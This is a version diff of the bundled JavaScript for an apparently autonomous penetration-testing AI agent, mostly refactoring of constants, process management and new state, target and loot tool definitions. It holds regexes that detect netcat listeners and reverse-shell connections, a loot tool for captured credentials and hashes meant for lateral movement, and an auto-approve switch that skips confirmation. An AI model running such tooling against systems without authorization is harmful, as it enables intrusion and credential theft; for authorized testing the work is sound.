pentesting 0.21.7 → 0.21.10

package/dist/main.js

@@ -13,11 +13,11 @@ import chalk from "chalk";
 import gradient from "gradient-string";
 
 // src/platform/tui/app.tsx
-import { useState as useState3, useCallback as useCallback2, useEffect as useEffect3 } from "react";
+import { useState as useState4, useCallback as useCallback3, useEffect as useEffect4 } from "react";
 import { Box as Box6, useInput, useApp } from "ink";
 
 // src/platform/tui/hooks/useAgent.ts
-import { useState, useEffect, useCallback, useRef } from "react";
+import { useState as useState2, useEffect as useEffect2, useCallback as useCallback2, useRef as useRef2 } from "react";
 
 // src/shared/constants/timing.ts
 var TOOL_TIMEOUTS = {
@@ -43,6 +43,18 @@ var DISPLAY_LIMITS = {
   TOOL_INPUT_TRUNCATED: 30,
   /** Max characters to show in tool output preview */
   TOOL_OUTPUT_PREVIEW: 200,
+  /** Max characters to show in tool output slice (events) */
+  TOOL_OUTPUT_SLICE: 80,
+  /** Max characters to show in tool error preview (events) */
+  TOOL_ERROR_SLICE: 120,
+  /** Max characters for delegate output preview */
+  DELEGATE_OUTPUT_SLICE: 60,
+  /** Max characters for command preview in logs */
+  COMMAND_PREVIEW: 100,
+  /** Max characters for output summary in agent loop */
+  OUTPUT_SUMMARY: 200,
+  /** Max characters for error preview in logs */
+  ERROR_PREVIEW: 100,
   /** Max characters for status thought preview */
   STATUS_THOUGHT_PREVIEW: 60,
   /** Max characters after truncation for status */
@@ -66,7 +78,19 @@ var DISPLAY_LIMITS = {
   /** Number of targets to preview in state summary */
   TARGET_PREVIEW: 3,
   /** Number of important findings to preview */
-  FINDING_PREVIEW: 5
+  FINDING_PREVIEW: 5,
+  /** Number of hashes to preview */
+  HASH_PREVIEW: 20,
+  /** Number of loot items to preview */
+  LOOT_PREVIEW: 30,
+  /** Number of recent process events to show */
+  RECENT_EVENT_COUNT: 5,
+  /** Max links to preview in browser output */
+  LINKS_PREVIEW: 20,
+  /** Max endpoints to sample */
+  ENDPOINT_SAMPLE: 5,
+  /** Purpose truncation length */
+  PURPOSE_TRUNCATE: 27
 };
 var AGENT_LIMITS = {
   /** Maximum agent loop iterations — generous to allow complex tasks.
@@ -113,11 +137,27 @@ var INPUT_PROMPT_PATTERNS = [
   /\(Y\/n\)/i
 ];
 
+// src/shared/constants/exit-codes.ts
+var EXIT_CODES = {
+  /** Successful execution */
+  SUCCESS: 0,
+  /** General error */
+  GENERAL_ERROR: 1,
+  /** Command not found */
+  COMMAND_NOT_FOUND: 127,
+  /** Process killed by SIGALRM (timeout) */
+  TIMEOUT: 124,
+  /** Process killed by SIGINT (Ctrl+C) */
+  SIGINT: 130,
+  /** Process killed by SIGTERM */
+  SIGTERM: 143
+};
+
 // src/shared/constants/agent.ts
 var ID_LENGTH = AGENT_LIMITS.ID_LENGTH;
 var ID_RADIX = AGENT_LIMITS.ID_RADIX;
 var APP_NAME = "Pentest AI";
-var APP_VERSION = "0.21.7";
+var APP_VERSION = "0.21.10";
 var APP_DESCRIPTION = "Autonomous Penetration Testing AI Agent";
 var LLM_ROLES = {
   SYSTEM: "system",
@@ -146,7 +186,11 @@ var SENSITIVE_INPUT_TYPES = [
 ];
 
 // src/shared/utils/id.ts
+var ID_DEFAULT_RADIX = 36;
+var ID_DEFAULT_LENGTH = 6;
 var generateId = (radix = 36, length = 8) => Math.random().toString(radix).substring(2, 2 + length);
+var generatePrefixedId = (prefix, radix = ID_DEFAULT_RADIX, randomLength = ID_DEFAULT_LENGTH) => `${prefix}_${Date.now()}_${Math.random().toString(radix).slice(2, 2 + randomLength)}`;
+var generateTempFilename = (suffix = "", prefix = "pentest") => `${prefix}-${Date.now()}-${Math.random().toString(ID_DEFAULT_RADIX).slice(2, 2 + ID_DEFAULT_LENGTH)}${suffix}`;
 
 // src/shared/constants/protocol.ts
 var PHASES = {
@@ -410,15 +454,23 @@ var DEFAULTS = {
 };
 
 // src/engine/process-manager.ts
-import { spawn as spawn2, execSync } from "child_process";
-import { readFileSync as readFileSync2, existsSync as existsSync2, unlinkSync, writeFileSync as writeFileSync2, appendFileSync } from "fs";
+import { spawn as spawn2, execSync as execSync2 } from "child_process";
+import { readFileSync as readFileSync2, existsSync as existsSync3, unlinkSync, writeFileSync as writeFileSync2, appendFileSync } from "fs";
 
 // src/engine/tools-base.ts
 import { spawn } from "child_process";
-import { readFileSync, existsSync, writeFileSync, mkdirSync } from "fs";
-import { join } from "path";
+import { readFileSync, existsSync as existsSync2, writeFileSync } from "fs";
+import { join, dirname } from "path";
 import { tmpdir } from "os";
 
+// src/shared/utils/file-utils.ts
+import { existsSync, mkdirSync } from "fs";
+function ensureDirExists(dirPath) {
+  if (!existsSync(dirPath)) {
+    mkdirSync(dirPath, { recursive: true });
+  }
+}
+
 // src/shared/constants/system.ts
 var PROCESS_ROLES = {
   LISTENER: "listener",
@@ -469,6 +521,10 @@ var SYSTEM_LIMITS = {
   MAX_STDOUT_SLICE: 3e3,
   /** Maximum characters to show from stderr */
   MAX_STDERR_SLICE: 500,
+  /** Maximum characters for error detail messages */
+  MAX_ERROR_DETAIL_SLICE: 200,
+  /** Maximum characters for input prompt previews */
+  MAX_PROMPT_PREVIEW: 50,
   /** Maximum characters for input snippets in logs */
   MAX_INPUT_SLICE: 100,
   /** Maximum events to keep in process event log */
@@ -486,12 +542,6 @@ var SYSTEM_LIMITS = {
   /** Port range for API services */
   API_PORT_RANGE: { MIN: 3e3, MAX: 3500 }
 };
-var EXIT_CODES2 = {
-  /** SIGINT (Ctrl+C) - 128 + 2 */
-  SIGINT: 130,
-  /** SIGTERM - 128 + 15 */
-  SIGTERM: 143
-};
 var DETECTION_PATTERNS = {
   LISTENER: /-(?:lvnp|nlvp|lp|p)\s+(\d+)/,
   HTTP_SERVER: /(?:http\.server|SimpleHTTPServer)\s+(\d+)/,
@@ -1115,11 +1165,11 @@ async function installTool(toolName) {
         globalEventEmitter?.({
           type: COMMAND_EVENT_TYPES.TOOL_INSTALL_FAILED,
           message: `Failed to install: ${toolName}`,
-          detail: stderr.slice(0, 200)
+          detail: stderr.slice(0, SYSTEM_LIMITS.MAX_ERROR_DETAIL_SLICE)
         });
         resolve({
           success: false,
-          output: `Failed to install ${toolName}: ${stderr.slice(0, 200)}`
+          output: `Failed to install ${toolName}: ${stderr.slice(0, SYSTEM_LIMITS.MAX_ERROR_DETAIL_SLICE)}`
         });
       }
     });
@@ -1169,7 +1219,7 @@ async function runCommand(command, args = [], options = {}) {
     globalEventEmitter?.({
       type: COMMAND_EVENT_TYPES.TOOL_RETRY,
       message: `Retrying command after installing ${toolName}...`,
-      detail: command.slice(0, 100)
+      detail: command.slice(0, DISPLAY_LIMITS.COMMAND_PREVIEW)
     });
   }
   return lastResult;
@@ -1179,7 +1229,7 @@ async function executeCommandOnce(command, args = [], options = {}) {
     const timeout = options.timeout ?? TOOL_TIMEOUTS.DEFAULT_COMMAND;
     globalEventEmitter?.({
       type: COMMAND_EVENT_TYPES.COMMAND_START,
-      message: `Executing: ${command.slice(0, 100)}${command.length > 100 ? "..." : ""}`
+      message: `Executing: ${command.slice(0, DISPLAY_LIMITS.COMMAND_PREVIEW)}${command.length > DISPLAY_LIMITS.COMMAND_PREVIEW ? "..." : ""}`
     });
     const child = spawn("sh", ["-c", command], {
       timeout,
@@ -1197,7 +1247,7 @@ async function executeCommandOnce(command, args = [], options = {}) {
           inputHandled = true;
           globalEventEmitter?.({
             type: COMMAND_EVENT_TYPES.INPUT_REQUIRED,
-            message: `Input required: ${data.trim().slice(0, 50)}`,
+            message: `Input required: ${data.trim().slice(0, SYSTEM_LIMITS.MAX_PROMPT_PREVIEW)}`,
             detail: "Waiting for user input..."
           });
           const promptText = data.trim();
@@ -1237,7 +1287,7 @@ async function executeCommandOnce(command, args = [], options = {}) {
         globalEventEmitter?.({
           type: COMMAND_EVENT_TYPES.COMMAND_FAILED,
           message: `Command failed (exit ${code})`,
-          detail: stderr.slice(0, 100)
+          detail: stderr.slice(0, SYSTEM_LIMITS.MAX_INPUT_SLICE)
         });
         resolve({
           success: false,
@@ -1262,7 +1312,7 @@ async function executeCommandOnce(command, args = [], options = {}) {
 }
 async function readFileContent(filePath) {
   try {
-    if (!existsSync(filePath)) {
+    if (!existsSync2(filePath)) {
       return {
         success: false,
         output: "",
@@ -1285,10 +1335,8 @@ async function readFileContent(filePath) {
 }
 async function writeFileContent(filePath, content) {
   try {
-    const dir = join(filePath, "..");
-    if (!existsSync(dir)) {
-      mkdirSync(dir, { recursive: true });
-    }
+    const dir = dirname(filePath);
+    ensureDirExists(dir);
     writeFileSync(filePath, content, "utf-8");
     return {
       success: true,
@@ -1304,20 +1352,11 @@ async function writeFileContent(filePath, content) {
   }
 }
 function createTempFile(suffix = "") {
-  return join(tmpdir(), `pentest-${Date.now()}-${Math.random().toString(ID_RADIX).substring(ID_LENGTH)}${suffix}`);
+  return join(tmpdir(), generateTempFilename(suffix));
 }
 
-// src/engine/process-manager.ts
-var backgroundProcesses = /* @__PURE__ */ new Map();
-var cleanupDone = false;
-var processEventLog = [];
-function logEvent(processId, event, detail) {
-  processEventLog.push({ timestamp: Date.now(), processId, event, detail });
-  if (processEventLog.length > SYSTEM_LIMITS.MAX_EVENT_LOG) {
-    processEventLog.splice(0, processEventLog.length - SYSTEM_LIMITS.MAX_EVENT_LOG);
-  }
-}
-function autoDetect(command) {
+// src/engine/process-detector.ts
+function detectProcessRole(command) {
   const tags = [];
   let port;
   let role = PROCESS_ROLES.BACKGROUND;
@@ -1365,6 +1404,12 @@ function autoDetect(command) {
   if (tags.length === 0) tags.push(PROCESS_ROLES.BACKGROUND);
   return { tags, port, role, isInteractive };
 }
+function detectConnection(stdout) {
+  return DETECTION_PATTERNS.CONNECTION.some((p) => p.test(stdout));
+}
+
+// src/engine/process-tree.ts
+import { execSync } from "child_process";
 function discoverChildPids(parentPid) {
   try {
     const result2 = execSync(`pgrep -P ${parentPid} 2>/dev/null || true`, {
@@ -1395,15 +1440,74 @@ function isPidAlive(pid) {
     return false;
   }
 }
-function detectConnection(stdout) {
-  return DETECTION_PATTERNS.CONNECTION.some((p) => p.test(stdout));
+async function killProcessTree(pid, childPids, waitMs = SYSTEM_LIMITS.SHUTDOWN_WAIT_MS) {
+  try {
+    process.kill(-pid, "SIGTERM");
+  } catch {
+    try {
+      process.kill(pid, "SIGTERM");
+    } catch {
+    }
+  }
+  for (const childPid of childPids) {
+    try {
+      process.kill(childPid, "SIGTERM");
+    } catch {
+    }
+  }
+  await new Promise((r) => setTimeout(r, waitMs));
+  if (isPidAlive(pid)) {
+    try {
+      process.kill(-pid, "SIGKILL");
+    } catch {
+    }
+    try {
+      process.kill(pid, "SIGKILL");
+    } catch {
+    }
+  }
+  for (const childPid of childPids) {
+    if (isPidAlive(childPid)) {
+      try {
+        process.kill(childPid, "SIGKILL");
+      } catch {
+      }
+    }
+  }
+}
+function killProcessTreeSync(pid, childPids) {
+  try {
+    process.kill(-pid, "SIGKILL");
+  } catch {
+  }
+  try {
+    process.kill(pid, "SIGKILL");
+  } catch {
+  }
+  for (const childPid of childPids) {
+    try {
+      process.kill(childPid, "SIGKILL");
+    } catch {
+    }
+  }
+}
+
+// src/engine/process-manager.ts
+var backgroundProcesses = /* @__PURE__ */ new Map();
+var cleanupDone = false;
+var processEventLog = [];
+function logEvent(processId, event, detail) {
+  processEventLog.push({ timestamp: Date.now(), processId, event, detail });
+  if (processEventLog.length > SYSTEM_LIMITS.MAX_EVENT_LOG) {
+    processEventLog.splice(0, processEventLog.length - SYSTEM_LIMITS.MAX_EVENT_LOG);
+  }
 }
 function startBackgroundProcess(command, options = {}) {
-  const processId = `bg_${Date.now()}_${Math.random().toString(36).slice(2, 6)}`;
+  const processId = generatePrefixedId("bg");
   const stdoutFile = createTempFile(".stdout");
   const stderrFile = createTempFile(".stderr");
   const stdinFile = createTempFile(".stdin");
-  const { tags, port, role, isInteractive } = autoDetect(command);
+  const { tags, port, role, isInteractive } = detectProcessRole(command);
   let wrappedCmd;
   if (isInteractive) {
     writeFileSync2(stdinFile, "", "utf-8");
@@ -1459,7 +1563,7 @@ async function sendToProcess(processId, input, waitMs = SYSTEM_LIMITS.DEFAULT_WA
   if (proc.hasExited) return { success: false, output: `Process ${processId} has exited`, newOutput: "" };
   let currentLen = 0;
   try {
-    if (existsSync2(proc.stdoutFile)) {
+    if (existsSync3(proc.stdoutFile)) {
       currentLen = readFileSync2(proc.stdoutFile, "utf-8").length;
     }
   } catch {
@@ -1473,7 +1577,7 @@ async function sendToProcess(processId, input, waitMs = SYSTEM_LIMITS.DEFAULT_WA
   await new Promise((r) => setTimeout(r, waitMs));
   let fullStdout = "";
   try {
-    if (existsSync2(proc.stdoutFile)) {
+    if (existsSync3(proc.stdoutFile)) {
       fullStdout = readFileSync2(proc.stdoutFile, "utf-8");
     }
   } catch {
@@ -1506,7 +1610,7 @@ function isProcessRunning(processId) {
   proc.childPids = discoverAllDescendants(proc.pid);
   if (proc.role === "listener") {
     try {
-      if (existsSync2(proc.stdoutFile)) {
+      if (existsSync3(proc.stdoutFile)) {
         const stdout = readFileSync2(proc.stdoutFile, "utf-8");
         if (detectConnection(stdout)) {
           promoteToShell(processId, "Reverse shell connected (auto-detected)");
@@ -1525,7 +1629,7 @@ function getProcessOutput(processId) {
   let stdout = "";
   let stderr = "";
   try {
-    if (existsSync2(proc.stdoutFile)) {
+    if (existsSync3(proc.stdoutFile)) {
       const content = readFileSync2(proc.stdoutFile, "utf-8");
       stdout = content.length > SYSTEM_LIMITS.MAX_STDOUT_SLICE ? `... [truncated ${content.length - SYSTEM_LIMITS.MAX_STDOUT_SLICE} chars] ...
 ` + content.slice(-SYSTEM_LIMITS.MAX_STDOUT_SLICE) : content;
@@ -1533,7 +1637,7 @@ function getProcessOutput(processId) {
   } catch {
   }
   try {
-    if (existsSync2(proc.stderrFile)) {
+    if (existsSync3(proc.stderrFile)) {
       const content = readFileSync2(proc.stderrFile, "utf-8");
       stderr = content.length > SYSTEM_LIMITS.MAX_STDERR_SLICE ? `... [truncated ${content.length - SYSTEM_LIMITS.MAX_STDERR_SLICE} chars] ...
 ` + content.slice(-SYSTEM_LIMITS.MAX_STDERR_SLICE) : content;
@@ -1554,46 +1658,14 @@ function getProcessOutput(processId) {
     isInteractive: proc.isInteractive
   };
 }
-async function stopProcess(processId) {
+async function stopBackgroundProcess(processId) {
   const proc = backgroundProcesses.get(processId);
   if (!proc) return { success: false, output: `Process ${processId} not found` };
   const wasActiveShell = proc.role === PROCESS_ROLES.ACTIVE_SHELL;
   const finalOutput = getProcessOutput(processId);
   if (!proc.hasExited) {
     proc.childPids = discoverAllDescendants(proc.pid);
-    try {
-      process.kill(-proc.pid, "SIGTERM");
-    } catch {
-      try {
-        process.kill(proc.pid, "SIGTERM");
-      } catch {
-      }
-    }
-    for (const childPid of proc.childPids) {
-      try {
-        process.kill(childPid, "SIGTERM");
-      } catch {
-      }
-    }
-    await new Promise((r) => setTimeout(r, SYSTEM_LIMITS.SHUTDOWN_WAIT_MS));
-    if (isPidAlive(proc.pid)) {
-      try {
-        process.kill(-proc.pid, "SIGKILL");
-      } catch {
-      }
-      try {
-        process.kill(proc.pid, "SIGKILL");
-      } catch {
-      }
-    }
-    for (const childPid of proc.childPids) {
-      if (isPidAlive(childPid)) {
-        try {
-          process.kill(childPid, "SIGKILL");
-        } catch {
-        }
-      }
-    }
+    await killProcessTree(proc.pid, proc.childPids);
   }
   try {
     unlinkSync(proc.stdoutFile);
@@ -1717,7 +1789,7 @@ async function cleanupAllProcesses() {
   backgroundProcesses.clear();
   for (const name of ORPHAN_PROCESS_NAMES) {
     try {
-      execSync(`pkill -f "${name}" 2>/dev/null || true`, { stdio: "ignore", timeout: SYSTEM_LIMITS.PROCESS_OP_TIMEOUT_MS });
+      execSync2(`pkill -f "${name}" 2>/dev/null || true`, { stdio: "ignore", timeout: SYSTEM_LIMITS.PROCESS_OP_TIMEOUT_MS });
     } catch {
     }
   }
@@ -1740,10 +1812,10 @@ function getResourceSummary() {
       const roleIcon = PROCESS_ICONS[p.role] || PROCESS_ICONS[PROCESS_ROLES.BACKGROUND];
       let lastOutput = "";
       try {
-        if (p.stdoutFile && existsSync2(p.stdoutFile)) {
+        if (p.stdoutFile && existsSync3(p.stdoutFile)) {
           const content = readFileSync2(p.stdoutFile, "utf-8");
-          const lines2 = content.trim().split("\n");
-          lastOutput = lines2.slice(-3).join(" | ").replace(/\n/g, " ");
+          const outputLines = content.trim().split("\n");
+          lastOutput = outputLines.slice(-3).join(" | ").replace(/\n/g, " ");
         }
       } catch {
       }
@@ -1767,7 +1839,7 @@ ${STATUS_MARKERS.WARNING} SUSPECTED ZOMBIES (Orphaned Children):`);
     for (const o of orphans) {
       lines.push(`  [${o.id}] Exited parent has alive children: ${o.childPids.join(", ")}`);
     }
-    lines.push(`  \u2192 Recommendation: Run bg_process({ action: "stop", process_id: "ID" }) to clean up entire tree.`);
+    lines.push(`  \u2192 Recommendation: Run bg_process({ action: "stop", process_id: "ID" }) to clean up.`);
   }
   if (ports.length > 0) {
     lines.push(`
@@ -1799,20 +1871,7 @@ Ports In Use: ${ports.join(", ")}`);
 function syncCleanupAllProcesses() {
   for (const [, proc] of backgroundProcesses) {
     if (!proc.hasExited) {
-      try {
-        process.kill(-proc.pid, "SIGKILL");
-      } catch {
-      }
-      try {
-        process.kill(proc.pid, "SIGKILL");
-      } catch {
-      }
-      for (const childPid of proc.childPids) {
-        try {
-          process.kill(childPid, "SIGKILL");
-        } catch {
-        }
-      }
+      killProcessTreeSync(proc.pid, proc.childPids);
     }
     try {
       unlinkSync(proc.stdoutFile);
@@ -1834,13 +1893,14 @@ process.on("exit", () => {
 process.on("SIGINT", () => {
   syncCleanupAllProcesses();
   backgroundProcesses.clear();
-  process.exit(EXIT_CODES2.SIGINT);
+  process.exit(EXIT_CODES.SIGINT);
 });
 process.on("SIGTERM", () => {
   syncCleanupAllProcesses();
   backgroundProcesses.clear();
-  process.exit(EXIT_CODES2.SIGTERM);
+  process.exit(EXIT_CODES.SIGTERM);
 });
+var stopProcess = stopBackgroundProcess;
 
 // src/engine/state-serializer.ts
 var StateSerializer = class {
@@ -1952,11 +2012,11 @@ var SharedState = class {
     for (const update of updates) {
       const index = this.data.missionChecklist.findIndex((item) => item.id === update.id);
       if (index !== -1) {
-        if (update.remove) {
+        if (update.shouldRemove) {
           this.data.missionChecklist.splice(index, 1);
         } else {
           if (update.text !== void 0) this.data.missionChecklist[index].text = update.text;
-          if (update.completed !== void 0) this.data.missionChecklist[index].isCompleted = update.completed;
+          if (update.isCompleted !== void 0) this.data.missionChecklist[index].isCompleted = update.isCompleted;
         }
       }
     }
@@ -2349,23 +2409,23 @@ function getApprovalLevel(toolCall) {
   return APPROVAL_LEVELS.CONFIRM;
 }
 var ApprovalGate = class {
-  constructor(autoApprove = false) {
-    this.autoApprove = autoApprove;
+  constructor(shouldAutoApprove = false) {
+    this.shouldAutoApprove = shouldAutoApprove;
   }
   /**
    * Set auto-approve mode
    */
   setAutoApprove(enabled) {
-    this.autoApprove = enabled;
+    this.shouldAutoApprove = enabled;
   }
   /**
    * Get current auto-approve mode
    */
   isAutoApprove() {
-    return this.autoApprove;
+    return this.shouldAutoApprove;
   }
   async request(toolCall) {
-    if (this.autoApprove) return { isApproved: true, reason: "Auto-approve enabled" };
+    if (this.shouldAutoApprove) return { isApproved: true, reason: "Auto-approve enabled" };
     const level = getApprovalLevel(toolCall);
     if (level === APPROVAL_LEVELS.AUTO) return { isApproved: true };
     if (level === APPROVAL_LEVELS.BLOCK) return { isApproved: false, reason: "Policy blocked execution" };
@@ -2696,106 +2756,330 @@ All ports freed. All children killed.`
   }
 ];
 
-// src/engine/tools-mid.ts
-import { execFileSync } from "child_process";
-
-// src/shared/utils/config.ts
-import path from "path";
-import { fileURLToPath } from "url";
-var __filename = fileURLToPath(import.meta.url);
-var __dirname = path.dirname(__filename);
-var ENV_KEYS = {
-  API_KEY: "PENTEST_API_KEY",
-  BASE_URL: "PENTEST_BASE_URL",
-  MODEL: "PENTEST_MODEL",
-  SEARCH_API_KEY: "SEARCH_API_KEY",
-  SEARCH_API_URL: "SEARCH_API_URL"
-};
-var DEFAULT_SEARCH_API_URL = "https://api.search.brave.com/res/v1/web/search";
-function getApiKey() {
-  return process.env[ENV_KEYS.API_KEY] || "";
-}
-function getBaseUrl() {
-  return process.env[ENV_KEYS.BASE_URL] || void 0;
-}
-function getModel() {
-  return process.env[ENV_KEYS.MODEL] || "";
-}
-function getSearchApiKey() {
-  return process.env[ENV_KEYS.SEARCH_API_KEY];
-}
-function getSearchApiUrl() {
-  return process.env[ENV_KEYS.SEARCH_API_URL] || DEFAULT_SEARCH_API_URL;
-}
-function isBrowserHeadless() {
-  return true;
-}
-
-// src/shared/constants/search-api.const.ts
-var SEARCH_URL_PATTERN = {
-  GLM: "bigmodel.cn",
-  ZHIPU: "zhipuai",
-  BRAVE: "brave.com",
-  SERPER: "serper.dev"
-};
-var SEARCH_HEADER = {
-  CONTENT_TYPE: "Content-Type",
-  AUTHORIZATION: "Authorization",
-  ACCEPT: "Accept",
-  X_SUBSCRIPTION_TOKEN: "X-Subscription-Token",
-  X_API_KEY: "X-API-KEY"
-};
-var SEARCH_LIMIT = {
-  DEFAULT_RESULT_COUNT: 10,
-  MAX_OUTPUT_LINES: 20,
-  TIMEOUT_MS: 1e4
-};
-
-// src/shared/utils/debug-logger.ts
-import { appendFileSync as appendFileSync2, mkdirSync as mkdirSync2, existsSync as existsSync3, writeFileSync as writeFileSync3 } from "fs";
-import { join as join2 } from "path";
-var DebugLogger = class _DebugLogger {
-  static instance;
-  logPath;
-  initialized = false;
-  constructor(clearOnInit = false) {
-    const debugDir = join2(process.cwd(), ".pentesting", "debug");
-    try {
-      if (!existsSync3(debugDir)) {
-        mkdirSync2(debugDir, { recursive: true });
-      }
-      this.logPath = join2(debugDir, "debug.log");
-      if (clearOnInit) {
-        this.clear();
+// src/engine/tools/pentest-state-tools.ts
+var createStateTools = (state) => [
+  {
+    name: TOOL_NAMES.UPDATE_MISSION,
+    description: `Update the mission summary and checklist.
+Use this for strategic planning and maintaining long-term context during complex engagements.
+The mission summary acts as your "long-term memory" \u2014 keep it updated with critical findings and overall progress.
+The checklist tracks granular steps (e.g., "[ ] Crack hashes", "[x] Recon 10.10.10.5").
+Mandatory when:
+  - Big goals change
+  - You encounter a major obstacle (firewall, port conflict)
+  - You gain a significant new access point (reverse shell)
+  - You need to summarize findings to prevent context overflow`,
+    parameters: {
+      summary: { type: "string", description: "Updated mission summary (concise overview)" },
+      checklist_updates: {
+        type: "array",
+        items: {
+          type: "object",
+          properties: {
+            id: { type: "string", description: "Item ID (required for update/remove)" },
+            text: { type: "string", description: "Updated text" },
+            completed: { type: "boolean", description: "Completion status" },
+            remove: { type: "boolean", description: "Remove item if true" }
+          },
+          required: ["id"]
+        },
+        description: "Updates to existing checklist items"
+      },
+      add_items: {
+        type: "array",
+        items: { type: "string" },
+        description: "New checklist items to add"
       }
-      this.initialized = true;
-      this.log("general", "=== DEBUG LOGGER INITIALIZED ===");
-      this.log("general", `Log file: ${this.logPath}`);
-    } catch (e) {
-      console.error("[DebugLogger] Failed to initialize:", e);
-      this.logPath = "";
-    }
-  }
-  static getInstance(clearOnInit = false) {
-    if (!_DebugLogger.instance) {
-      _DebugLogger.instance = new _DebugLogger(clearOnInit);
+    },
+    execute: async (p) => {
+      if (p.summary) state.setMissionSummary(p.summary);
+      if (p.checklist_updates) state.updateMissionChecklist(p.checklist_updates);
+      if (p.add_items) state.addMissionChecklistItems(p.add_items);
+      return {
+        success: true,
+        output: `Mission updated.
+Summary: ${state.getMissionSummary()}
+Checklist Items: ${state.getMissionChecklist().length}`
+      };
     }
-    return _DebugLogger.instance;
-  }
-  /** Reset the singleton instance (used by initDebugLogger) */
-  static resetInstance(clearOnInit = false) {
-    _DebugLogger.instance = new _DebugLogger(clearOnInit);
-    return _DebugLogger.instance;
+  },
+  {
+    name: TOOL_NAMES.GET_STATE,
+    description: "Get current engagement state summary",
+    parameters: {},
+    execute: async () => ({ success: true, output: state.toPrompt() })
   }
-  log(category, message, data) {
-    if (!this.initialized || !this.logPath) return;
-    try {
-      const timestamp = (/* @__PURE__ */ new Date()).toISOString();
-      let logLine = `[${timestamp}] [${category.toUpperCase()}] ${message}`;
-      if (data !== void 0) {
-        logLine += ` | ${JSON.stringify(data)}`;
-      }
-      logLine += "\n";
+];
+
+// src/engine/tools/pentest-target-tools.ts
+var createTargetTools = (state) => [
+  {
+    name: TOOL_NAMES.ADD_TARGET,
+    description: `Register a new target for the engagement.
+Use this when you discover new hosts during recon, pivoting, or post-exploitation.
+The target will be tracked in SharedState and available for all agents.`,
+    parameters: {
+      ip: { type: "string", description: "Target IP address" },
+      hostname: { type: "string", description: "Target hostname (optional)" },
+      ports: {
+        type: "array",
+        items: {
+          type: "object",
+          properties: {
+            port: { type: "number", description: "Port number" },
+            service: { type: "string", description: "Service name (e.g., http, ssh)" },
+            version: { type: "string", description: "Service version" },
+            state: { type: "string", description: "Port state (default: open)" }
+          },
+          required: ["port", "service"]
+        },
+        description: "Discovered ports (optional, can add later via recon)"
+      },
+      tags: {
+        type: "array",
+        items: { type: "string" },
+        description: 'Tags for categorization (e.g., "internal", "dmz", "pivot")'
+      }
+    },
+    required: ["ip"],
+    execute: async (p) => {
+      const ip = p.ip;
+      const existing = state.getTarget(ip);
+      if (existing) {
+        const newPorts = p.ports || [];
+        for (const np of newPorts) {
+          const exists = existing.ports.some((ep) => ep.port === np.port);
+          if (!exists) {
+            existing.ports.push({
+              port: np.port,
+              service: np.service || "unknown",
+              version: np.version,
+              state: np.state || "open",
+              notes: []
+            });
+          }
+        }
+        if (p.hostname) existing.hostname = p.hostname;
+        if (p.tags) existing.tags = [.../* @__PURE__ */ new Set([...existing.tags, ...p.tags])];
+        return { success: true, output: `Target ${ip} updated. Total ports: ${existing.ports.length}` };
+      }
+      const ports = (p.ports || []).map((port) => ({
+        port: port.port,
+        service: port.service || "unknown",
+        version: port.version,
+        state: port.state || "open",
+        notes: []
+      }));
+      state.addTarget({
+        ip,
+        hostname: p.hostname,
+        ports,
+        tags: p.tags || [],
+        firstSeen: Date.now()
+      });
+      return { success: true, output: `Target ${ip} added.${p.hostname ? ` Hostname: ${p.hostname}` : ""} Ports: ${ports.length}` };
+    }
+  },
+  {
+    name: TOOL_NAMES.ADD_LOOT,
+    description: `Record captured loot (credentials, hashes, tokens, SSH keys, files, etc).
+Use this whenever you discover sensitive data during the engagement.
+Loot is tracked in SharedState and visible to all agents for credential reuse and lateral movement.
+Types: credential, hash, token, ssh_key, api_key, file, session, ticket, certificate`,
+    parameters: {
+      type: { type: "string", description: "Loot type: credential, hash, token, ssh_key, api_key, file, session, ticket, certificate" },
+      host: { type: "string", description: "Source host where loot was found" },
+      detail: { type: "string", description: 'Loot detail (e.g., "admin:Password123", "root:$6$...", "JWT admin token")' }
+    },
+    required: ["type", "host", "detail"],
+    execute: async (p) => {
+      const lootType = p.type;
+      const crackableTypes = ["hash"];
+      state.addLoot({
+        type: lootType,
+        host: p.host,
+        detail: p.detail,
+        obtainedAt: Date.now(),
+        isCrackable: crackableTypes.includes(lootType),
+        isCracked: false
+      });
+      return {
+        success: true,
+        output: `Loot recorded: [${lootType}] from ${p.host}
+Detail: ${p.detail}
+` + (crackableTypes.includes(lootType) ? `This is crackable. Consider: hash_crack({ hashes: "${p.detail.slice(0, 30)}..." })` : `Consider credential reuse / lateral movement with this loot.`)
+      };
+    }
+  },
+  {
+    name: TOOL_NAMES.ADD_FINDING,
+    description: "Add a security finding",
+    parameters: {
+      title: { type: "string", description: "Finding title" },
+      severity: { type: "string", description: "Severity" },
+      affected: { type: "array", items: { type: "string" }, description: "Affected host:port" }
+    },
+    required: ["title", "severity"],
+    execute: async (p) => {
+      state.addFinding({
+        id: generateId(ID_RADIX, ID_LENGTH),
+        title: p.title,
+        severity: p.severity,
+        affected: p.affected || [],
+        description: p.description || "",
+        evidence: [],
+        isVerified: false,
+        remediation: "",
+        foundAt: Date.now()
+      });
+      return { success: true, output: `Added: ${p.title}` };
+    }
+  }
+];
+
+// src/engine/tools-mid.ts
+import { execFileSync } from "child_process";
+
+// src/shared/utils/config.ts
+import path from "path";
+import { fileURLToPath } from "url";
+var __filename = fileURLToPath(import.meta.url);
+var __dirname = path.dirname(__filename);
+var ENV_KEYS = {
+  API_KEY: "PENTEST_API_KEY",
+  BASE_URL: "PENTEST_BASE_URL",
+  MODEL: "PENTEST_MODEL",
+  SEARCH_API_KEY: "SEARCH_API_KEY",
+  SEARCH_API_URL: "SEARCH_API_URL"
+};
+var DEFAULT_SEARCH_API_URL = "https://api.search.brave.com/res/v1/web/search";
+function getApiKey() {
+  return process.env[ENV_KEYS.API_KEY] || "";
+}
+function getBaseUrl() {
+  return process.env[ENV_KEYS.BASE_URL] || void 0;
+}
+function getModel() {
+  return process.env[ENV_KEYS.MODEL] || "";
+}
+function getSearchApiKey() {
+  return process.env[ENV_KEYS.SEARCH_API_KEY];
+}
+function getSearchApiUrl() {
+  return process.env[ENV_KEYS.SEARCH_API_URL] || DEFAULT_SEARCH_API_URL;
+}
+function isBrowserHeadless() {
+  return true;
+}
+
+// src/shared/constants/search-api.const.ts
+var SEARCH_URL_PATTERN = {
+  GLM: "bigmodel.cn",
+  ZHIPU: "zhipuai",
+  BRAVE: "brave.com",
+  SERPER: "serper.dev"
+};
+var SEARCH_HEADER = {
+  CONTENT_TYPE: "Content-Type",
+  AUTHORIZATION: "Authorization",
+  ACCEPT: "Accept",
+  X_SUBSCRIPTION_TOKEN: "X-Subscription-Token",
+  X_API_KEY: "X-API-KEY"
+};
